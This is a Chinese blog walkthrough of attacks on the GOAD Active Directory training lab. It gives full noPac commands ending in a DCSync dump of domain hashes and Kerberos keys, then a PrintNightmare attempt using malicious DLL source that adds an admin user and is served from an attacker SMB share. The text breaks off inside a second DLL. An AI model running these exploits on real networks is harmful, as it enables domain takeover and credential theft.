从零开始的GOAD生活(中)

今天我们的目标是拿下北境。

使用的漏洞为CVE-2021-42278 (NoPac)

添加机器:你有一个普通机器账户(如 relayedpc$)。

重命名 (你的问题):你利用 renameMachine.py (或 bloodyAD) 将 relayedpc$ 改名为 winterfell (去掉 $,让 KDC 误以为它是域控)。

请求票据:使用这个假冒的名字请求 TGT。

恢复名字:在 TGT 到手后,迅速把名字改回 relayedpc$ (为了防止服务票据请求失败)。

S4U2self:利用改名时拿到的 TGT 获取域管权限的服务票据。

准备添加机器用户。

查看机器账户配额

1
2
3
4
5
6
7
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc ldap winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M maq
LDAP        192.168.10.11   389    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:None) (channel binding:Never)                                                                                                                              
LDAP        192.168.10.11   389    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing 
MAQ         192.168.10.11   389    WINTERFELL       [*] Getting the MachineAccountQuota
MAQ         192.168.10.11   389    WINTERFELL       MachineAccountQuota: 10

我们要做的是添加一台计算机,清除那台计算机的SPN,重命名成与DC同名的计算机,为计算机获取一个TGT,将计算机名称重置为他原来的名字,使用我们之前获得的 TGT 获得服务票证,最后 dcsync

添加计算机

1
2
3
4
5
6
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-addcomputer -computer-name 'samaccountname$' -computer-pass 'ComputerPassword' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account samaccountname$ with password ComputerPassword.

清除spn

https://github.com/dirkjanm/krbrelayx

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# python addspn.py --clear -t 'samaccountname$' -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' 'winterfell.north.sevenkingdoms.local'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] Printing object before clearing
DN: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local - STATUS: Read - READ TIME: 2026-02-02T01:57:32.542507
    sAMAccountName: samaccountname$

[+] SPN Modified successfully

重命名计算机(命名为DC的名字)

gist.githubusercontent.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383/raw/d4191e295c96bc1cfb0a54b18cfbb8b21d25b483/renameMachine.py

1
2
3
4
5
6
┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# python renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target machine renamed successfully!

获取TGT

1
2
3
4
5
6
┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# impacket-getTGT -dc-ip 'winterfell.north.sevenkingdoms.local' 'north.sevenkingdoms.local'/'winterfell':'ComputerPassword'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in winterfell.ccache

恢复计算机名

1
2
3
4
5
6
┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# python renameMachine.py -current-name 'winterfell' -new-name 'samaccount$' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target machine renamed successfully!

利用getST.py 通过S4U2self协议向域控请求ST

S4U2Self: 服务A通过S4U2Self协议,可以从域服务器获取账号B访问应用服务器A的TGS票据,就像账号B主动从域服务器获取一个访问服务A的TGS票据一样。可以理解为通过该协议,可以获取域内任意账号访问服务A的TGS票据,过程中不需要账号B认证到域

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-getST -self -impersonate 'administrator' -altservice 'CIFS/winterfell.north.sevenkingdoms.local' -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' 'north.sevenkingdoms.local'/'winterfell' -debug
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: winterfell.ccache
[+] Returning cached credential for KRBTGT/NORTH.SEVENKINGDOMS.LOCAL@NORTH.SEVENKINGDOMS.LOCAL
[+] Using TGT from cache
[+] Username retrieved from CCache: winterfell
[*] Impersonating administrator
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=NORTH.SEVENKINGDOMS.LOCAL
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   winterfell

 cusec=970874
 ctime=20260202071620Z



[+] S4UByteArray
 0000   01 00 00 00 61 64 6D 69  6E 69 73 74 72 61 74 6F   ....administrato
 0010   72 6E 6F 72 74 68 2E 73  65 76 65 6E 6B 69 6E 67   rnorth.sevenking
 0020   64 6F 6D 73 2E 6C 6F 63  61 6C 4B 65 72 62 65 72   doms.localKerber
 0030   6F 73                                              os
[+] CheckSum
 0000   C0 71 1D B8 6B C8 F2 05  F1 B8 C4 4A D2 39 87 00   .q..k......J.9..
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator

 userRealm=north.sevenkingdoms.local
 cksum=Checksum:
  cksumtype=-138
  checksum=0xc0711db86bc8f205f1b8c44ad2398700

 auth-package=Kerberos

[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=0x6e82051a30820516a003020105a10302010ea20703050000000000a382047c6182047830820474a003020105a11b1b194e4f5254482e534556454e4b494e47444f4d532e4c4f43414ca22e302ca003020101a12530231b066b72627467741b194e4f5254482e534556454e4b494e47444f4d532e4c4f43414ca382041e3082041aa003020112a103020102a282040c0482040817500a4b11c4fe9ff3ccf0d5bb07e1c3fb9ba650646cae5d2c7df8f447e4cf1f238d03acc4ab3f36460d13be916bee5132977867d2e41c529976d2c8c39f8dd2040d7ff3c39909c31dfe0de221617d36a7b01ecaa7cfd0ebb6f15c8a1bfdd992ec3f7702ec70ac6e7c2ae487ff6353b4de7e0e0b1c2727ab79092784d338d42cffe38b4d21b8cc281d75546c7b033d46e5477579e7d89c7fe02b85395c155af86b33410c16a504acc3895ce505d9ce1ce6a0f7a81c6a66ef307a7ceddab0e8bde9658d37dbf89b7020cfecbba389c044b53b96ae865bbd499e897030c025f1039a8c2d052ef5adf480792800493ef971688fb418e9b72747ffd47f7661b7eba37f3d2c508a099f6d68256e6e3d5bc4bf4c859ce4773e59cfd51ee9ad494348cc42aa37a07e594b781a0d175563f1810e5479dfa26d16ffea03640141705b3a4e9c715d9e8eb0172d5ae48813ebbac25790d9de1bb96d3f36d8a2ca97da95204af2f14aeea8c0ad8ed62473520530838d617d249c0c268e4598dc81a7df5535dea36dd2bd960b3a19ba9aed41f64013fc16c1d588fb17d372bd4d50462ec0729fa5186d91cba3b6c53f82cced9866e55b5d2eb348d84ac4ab8f491e3f285412f68a5404d3983bc616dca71483c62aa58a985ab0a2d487ff82e82887ad9b6ef90e8488c097e182f44f494cc118f27323237de236b80ca97964d1add97142bfdcb4c32a570a7f06648e7b49f35d1ea76ef9da1581146bb8f590089056c58ba01c97bbc885b229525215fe28426d9aa838e986c082fbaea320c5e94fe9071489e384ad65ca909e76f9ef4a35b5691064ef99fcf0a45d4efe4054bf052a3d9428e7ca86e7c931174c70ca1ada23e7f1c6582cd12141587a5bef7487aae9cfa147bd2f5234dd191d9c0b77dc2c26324bd1df21b338d6dfbee6e93b62b9bbfb5ae7170c552e49ca025bdab2a72eba69e7c8133c66120949176af37793c1479c0f05e61757fa0e88322a3736dc70378163754d0487dcb6022dae0e1646824ab233278a4f96bb2fb2b9d3dd521251023ef2233321c1c9ffe960775e08cbd380ddef28e4be2e8a50f0168e46ca6c29f5b60fa9f879cd4745c559eb8379bb1a035587fc8a668c162d0a9e9961df5ae956508ebd14bee6dd34dbafa4772caf96be25e783399eda06130b9bd5adac37efa78ed6f5cd2b45310d949e26191cc25173b74ef9e7713ec447d90270f24c287f90abc55e706d020e8e5b39fbea92d26455c2e5d331ca22d7914dc8a77baf8d1dc4c83de4b6dd5c9f36cc9c5470487de835164f8d10adc740f4ddb3798713d1fc04d41453850e138e743ab77c3f19237ee4ce8f5d8cf1d787056a13f530c4f91d84c6bbf29240179b6c8c261918bae467a03821ee1836073663afd90de149fb0681d9a9af887b52fe1ec5e320d5cfd889b0e180966abcde89f0fbd7a46573a48180307ea003020112a2770475a805e72b84d06ecfa4e3c06b1c21eabec9690601eb0e459ba6bea5f5ac2047272b70a67e3756e530be9084c99a6651083ddfa02cdbcc9428cfb8fc5e4fde1ed983b5107656b9d62caa5e42cf30228a37c063c4bef9d6c15465a54aaf7eba454f2db2e85faac3879abe03008afb214ce70d46bb6a5b
  PA_DATA:
   padata-type=129
   padata-value=0x3063a01a3018a003020101a111300f1b0d61646d696e6973747261746f72a11b1b196e6f7274682e736576656e6b696e67646f6d732e6c6f63616ca21c301aa0040202ff76a1120410c0711db86bc8f205f1b8c44ad2398700a30a1b084b65726265726f73

 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=NORTH.SEVENKINGDOMS.LOCAL
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    winterfell

  till=20260203071620Z
  nonce=1127067172
  etype=SequenceOf:
   18   23


[*] Requesting S4U2self
[+] Trying to connect to KDC at winterfell.north.sevenkingdoms.local:88
[+] Original sname is not formatted as usual (i.e. CLASS/HOSTNAME), automatically filling the substitution service will fail
[+] Original sname is: winterfell
[+] No service realm in new SPN, using the current one (NORTH.SEVENKINGDOMS.LOCAL)
[*] Changing service from winterfell@NORTH.SEVENKINGDOMS.LOCAL to CIFS/winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL
[*] Saving ticket in administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache

之后利用保存的票据进行DCSync攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# export KRB5CCNAME=administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' @'winterfell.north.sevenkingdoms.local'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x5c187ac5247c939e6bc15282bce1e92d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NORTH\WINTERFELL$:plain_password_hex:fd0dd579adf168c6cd4a3813bda4973d25bb8bd798e41c6a2f14de4eb21f1e2e979258e2402d6130460a16eb00827133d0ca596fb2aa503a839dc9e9a7c1a71acc35ee397c99d532d9c992dce4f0391102b1ce574b593d21aa6b51501aed76d3c93b862a51a9a8279e24fd74442cb5690a880d7c419646f0c0950b30bc8cbcd3dcf5785b393a7f9c0b5bcee7c97af2b9971cfd7c2f1c60b8f4da9ff1fdcc5f640a30cc5621a4420b9ee9281edc0eabdd3c04f9072f0adb6d9c6da79a1f0b70ad58d7ef2bd66e48a0e9de750faeebb4c188a522fb8459f218a8af10206addd5e9b4970ebccd286142e84e98375d3d2268
NORTH\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:f9a4c95e41bd1238887ce5e7ca12039a:::
[*] DefaultPassword 
NORTH\robb.stark:sexywolfy
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x97a8af655dda4d3028aa6ca91e43d1033195e014
dpapi_userkey:0xbd0c69088f040653a8eef62ec8be6560ea41f2b8
[*] NL$KM 
 0000   A0 B9 07 4A 55 70 F9 F9  FA CC 68 30 15 F5 95 A2   ...JUp....h0....
 0010   58 69 29 AD 87 BA A5 9F  76 EB AC F3 07 63 71 5A   Xi).....v....cqZ
 0020   ED 26 C1 FC 5A 2B D3 25  A0 74 E6 E4 90 53 D5 19   .&..Z+.%.t...S..
 0030   E8 D6 BD D0 F3 36 76 5A  A6 74 1B 5B D8 30 90 2A   .....6vZ.t.[.0.*
NL$KM:a0b9074a5570f9f9facc683015f595a2586929ad87baa59f76ebacf30763715aed26c1fc5a2bd325a074e6e49053d519e8d6bdd0f336765aa6741b5bd830902a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:921fb182cfcf32e3a83332da4ad500b6:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:f9a4c95e41bd1238887ce5e7ca12039a:::
CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:0dfd2a24c6bff862ced231c6aab1728a:::
samaccount$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:c54199154ad73c3fd01ec9f233dbb1c9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:db2ad65b1eb1bb5a4fb4b3d55412b102e7deb11cade1166ec9097b9593b56d70
krbtgt:aes128-cts-hmac-sha1-96:c6e4a39a498e405fb41b96564b53caf2
krbtgt:des-cbc-md5:753dd6768f103779
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:a268e7a385f4f165c6489c18a3bdeb52c5e505050449c6f9aeba4bc06a7fcbed
sansa.stark:aes128-cts-hmac-sha1-96:e2e6e885f6f4d3e25d759ea624961392
sansa.stark:des-cbc-md5:4c7c16e3f74cc4d3
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
WINTERFELL$:aes256-cts-hmac-sha1-96:536f18d284a034da7b3b2773ecd38b290da94cb60b140f3991e2a61d723084c6
WINTERFELL$:aes128-cts-hmac-sha1-96:925b7f6e5fa6fa831d02fefe3f27e927
WINTERFELL$:des-cbc-md5:67f84098a2c7fe3e
CASTELBLACK$:aes256-cts-hmac-sha1-96:0db8d97ee33a620d961fe254ab70b6635d184be4c9795ac0244d6e8afb3a1ae6
CASTELBLACK$:aes128-cts-hmac-sha1-96:662441eb1d89f45693edda51b1e20aea
CASTELBLACK$:des-cbc-md5:5d5ece267919f44c
samaccount$:aes256-cts-hmac-sha1-96:7b9a52e2d94aa24dcea3d181001b03380291929a0094fa5b24f44d2a221faa89
samaccount$:aes128-cts-hmac-sha1-96:98c00ce456e342106141609163511daa
samaccount$:des-cbc-md5:f8ab2001bcecc252
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:685f215e60383f5b4ceab557a475291ced63a62d8b938e743253c1c4d4c72a36
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:63cb1cb0fe6926ba1a71cff25ad6588b
SEVENKINGDOMS$:des-cbc-md5:df23da31739ee90e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f9b9dab0900>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f9b9dab0900>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

报了些错误,不过问题不大,ntds哈希导出成功,北境沦陷,临冬城被付之一炬,现在着手清理痕迹吧。

1
2
3
4
5
6
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-addcomputer -computer-name 'samaccount$' -delete -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4' 'north.sevenkingdoms.local/Administrator'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully deleted samaccount$.

成功删除了添加的恶意机器账户。

下一个目标是利用PrintNightmare攻击弥林。

Windows 提权-PrintNightmare - 扛枪的书生 - 博客园

查看目标机器是否运行服务。

1
2
3
4
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-rpcdump @192.168.10.12 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol 
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

准备恶意文件 nightmare.c。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <windows.h> 

int RunCMD()
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

编译为恶意dll文件。

要注意这个漏洞只能在旧的winserver2016也就是弥林这个域控上用。

1
2
3
4
5
6
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim nightmare.c
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

准备一个带有恶意dll文件的smb共享

1
2
3
4
5
6
7
8
┌──(root㉿kaada)-[/opt/printnightmare]
└─# ls
CVE-2021-1675.py  Images  nightmare.dll  README.md  SharpPrintNightmare
                                                                                                                                                           
┌──(root㉿kaada)-[/opt/printnightmare]
└─# impacket-smbserver -smb2support ATTACKERSHARE .
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

攻击,但是报错了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kaada)-[/opt/printnightmare]
└─# python CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.10.150\ATTACKERSHARE\nightmare.dll'
[*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.10.150\ATTACKERSHARE\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "/opt/printnightmare/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
    ~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/printnightmare/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rprn.py", line 657, in hRpcAddPrinterDriverEx
    return dce.request(request)
           ~~~~~~~~~~~^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1436, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

停掉防火墙试试,但是靶机服务崩了。

歇菜了这下.

  • 需要知道的是:在一些失败之后,spooler服务将被defender停止,并且在有人重新启动服务器或spooler服务之前不会再被利用。

那只能打临冬城试试了,不过临冬城是有windowsdefender的,得换一个恶意dll文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
/*
 * ADDUSER.C: creating a Windows user programmatically.
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>

DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    DWORD cbSid = 256;    // 256 bytes should be enough for everybody :)
    BYTE Sid[256];

    DWORD cbDomain = 256 / sizeof(TCHAR);
    TCHAR Domain[256];

    // Create user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name        = _T("pnightmare2");                // username
    ud.usri1_password    = _T("Test123456789!");             // password
    ud.usri1_priv        = USER_PRIV_USER;                   // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags       = UF_SCRIPT | UF_NORMAL_ACCOUNT;    // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,            // local server
        1,                // information level
        (LPBYTE)&ud,
        NULL            // error value
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

   _tprintf(_T("NetUserAdd OK\r\n"), rc, rc);

    // Get user SID
    b = LookupAccountName(
        NULL,            // local server
        ud.usri1_name,   // account name
        Sid,             // SID
        &cbSid,          // SID size
        Domain,          // Domain
        &cbDomain,       // Domain size
        &snu             // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
        return dw;
    }

